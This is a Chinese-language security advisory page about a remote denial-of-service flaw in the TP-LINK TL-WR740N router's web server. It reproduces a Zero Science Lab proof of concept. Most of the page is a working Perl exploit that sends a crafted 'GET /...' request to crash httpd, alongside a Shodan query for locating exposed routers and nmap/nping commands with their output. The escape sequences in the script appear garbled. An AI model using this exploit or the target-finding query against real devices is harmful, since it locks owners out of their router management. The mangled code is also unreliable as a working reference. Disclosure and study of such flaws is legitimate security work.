TP-LINK TL-WR740N路由器拒绝服务漏洞

发布日期：2013-03-21
更新日期：2013-03-22受影响系统：
TP-LINK TL-WR740N v4.23
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 58623

TL-WR740N是150Mbps的无线路由器。

TL-WR740N 3.16.4 Build 130205 Rel.63875n路由器在实现上存在远程拒绝服务漏洞。如果Web服务器（httpd）不在默认的TCP端口80上处理HTTP GET请求，攻击者发送一系列的三个点（...）到路由器，会致使httpd崩溃，用户将无法访问管理控制面板的管理界面。重启路由器后可以正常工作。

<*来源：Gjoko Krstic （liquidworm@gmail.com）
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#！/usr/local/bin/perl
#
#
# TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
#
#
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.us
#
# Affected version:
#
# - Firmware version: 3.16.4 Build 130205 Rel.63875n （Released:
2/5/2013）
# - Hardware version: WR740N v4 00000000 （v4.23）
# - Model No. TL-WR740N / TL-WR740ND
#
# Summary: The TL-WR740N is a combined wired/wireless network connection
# device integrated with internet-sharing router and 4-port switch. The
# wireless N Router is 802.11b&g compatible based on 802.11n technology
# and gives you 802.11n performance up to 150Mbps at an even more
affordable
# price. Bordering on 11n and surpassing 11g speed enables high
bandwidth
# consuming applications like video streaming to be more fluid.
#
# Desc: The TP-Link WR740N Wireless N Router network device is exposed
to a
# remote denial of service vulnerability when processing a HTTP request.
This
# issue occurs when the web server （httpd） fails to handle a HTTP GET
request
# over a given default TCP port 80. Sending a sequence of three dots
（...） to
# the router will crash its httpd service denying the legitimate users
access
# to the admin control panel management interface. To bring back the
http srv
# and the admin UI, a user must physically reboot the router.
#
#
# ============================== Playground:
==============================
#
# Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router
WR740N"
#
# # nmap -sV 192.168.0.1
#
# Starting Nmap 6.01 （ http://nmap.org ） at 2013-03-19 04:53 Central
European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up （0.00s latency）.
# Not shown: 999 closed ports
# PORT STATE SERVICE VERSION
# 80/tcp open http TP-LINK WR740N WAP http config
# MAC Address: AA:BB:CC:DD:EE:FF （Tp-link Technologies CO.）
# Service Info: Device: WAP
#
# Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
# Nmap done: 1 IP address （1 host up） scanned in 12.42 seconds
#
#
--------------------------------------------------------------------------
# Changed Probe Directive in nmap-service-probes file [4 d range]:
# - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0 |
# + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0 |
#
--------------------------------------------------------------------------
#
# # nping -c1 --tcp -p80 192.168.0.1 --data
"474554202f2e2e2e20485454502f312e310d0a0d0a"
#
# Starting Nping 0.6.01 （ http://nmap.org/nping ） at 2013-03-19 04:55
Central European Standard Time
# SENT （0.0920s） TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64
id=21796 iplen=61 seq=1961954057 win=1480
# RCVD （0.1220s） TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0
iplen=40 seq=0 win=0
#
# Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
# Raw packets sent: 1 （75B） | Rcvd: 1 （46B） | Lost: 0 （0.00%）
# Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
# Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
# Nping done: 1 IP address pinged in 1.12 seconds
#
#
--------------------------------------------------------------------------
#
# # nmap -Pn 192.168.0.1 -p80
#
# Starting Nmap 6.01 （ http://nmap.org ） at 2013-03-19 04:57 Central
European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up （0.00s latency）.
# PORT STATE SERVICE
# 80/tcp closed http
# MAC Address: AA:BB:CC:DD:EE:FF （Tp-link Technologies CO.）
#
# Nmap done: 1 IP address （1 host up） scanned in 0.23 seconds
#
# ============================= ！Playground
===============================
#
#
# Tested on: Router Webserver
#
#
# Vulnerability discovered by Gjoko "LiquidWorm" Krstic
#
# Copyleft （c） 2013, Zero Science Lab
# Macedonian Information Security Research And Development Laboratory
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2013-5135
# Advisory URL:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
#
#
# 17.03.2013
#

use IO::Socket;

$ip="$ARGV[0]"; $port="$ARGV[1]";

print " x20"."x1f"x42 ." ";
print "x20x1f"."x20"x40 ."x1f ";
print "x20x1f TP-Link TL-WR740N httpd DoS Exploit x1f ";
print "x20x1f"."x20"x40 ."x1f ";
print "x20x1f"."x20"x7 ."x16"x5 ."x20"x15 ."x16"x5 ."x20"x8
."x1f ";
print "x20x1f"."x20"x9 ."x16"."x20"x19 ."x16"."x20"x10 ."x1f ";
print "x20" ."x1f"x42 ." ";
print "x20x4" ."x20"x40 ."x4 ";
print "x20" ."x1e" x 42 ." ";

if（$#ARGV<1）
{
print " x20x20x1ax20Usage: $0 <ip> <port> ";
exit（）;
}

$socket=IO::Socket::INET->new（
Proto => "tcp",
PeerAddr => $ip,
PeerPort => $port
）;

$ta4ke="x47x45x54x20".
"x2fx2ex2ex2e".
"x20x48x54x54".
"x50x2fx31x2e".
"x31x0dx0ax0d".
"x0a";

print " x20x1ax20Sending evil payload... "; sleep 2;
print $socket "$ta4ke"; sleep 5; close $socket;
print "x20x1ax20HTTPd successfully poked. "; sleep 2;
print "x20x1ax20Verifying with Nmap... "; sleep 2;
system（"nmap -Pn $ip -p $port"）;
print " x20x1ax20Playing goa-psy... "; sleep 2;
system（"start C:\Progra~1\Winamp\winamp.exe
http://wwww.example.com/stream/1008"）;
sleep 1; print "x20x1ax20All Done！ "; sleep 1;

# Codename: Threetwoees建议：
--------------------------------------------------------------------------------
厂商补丁：

TP-LINK
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.tp-link.com.au/products/details/？model=TL-WR740NLinux Kernel 本地权限提升漏洞（CVE-2013-1848）Apple iOS 6.1.3 锁屏安全绕过漏洞相关资讯 TL-WR740N安全漏洞 TL-WR740N 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论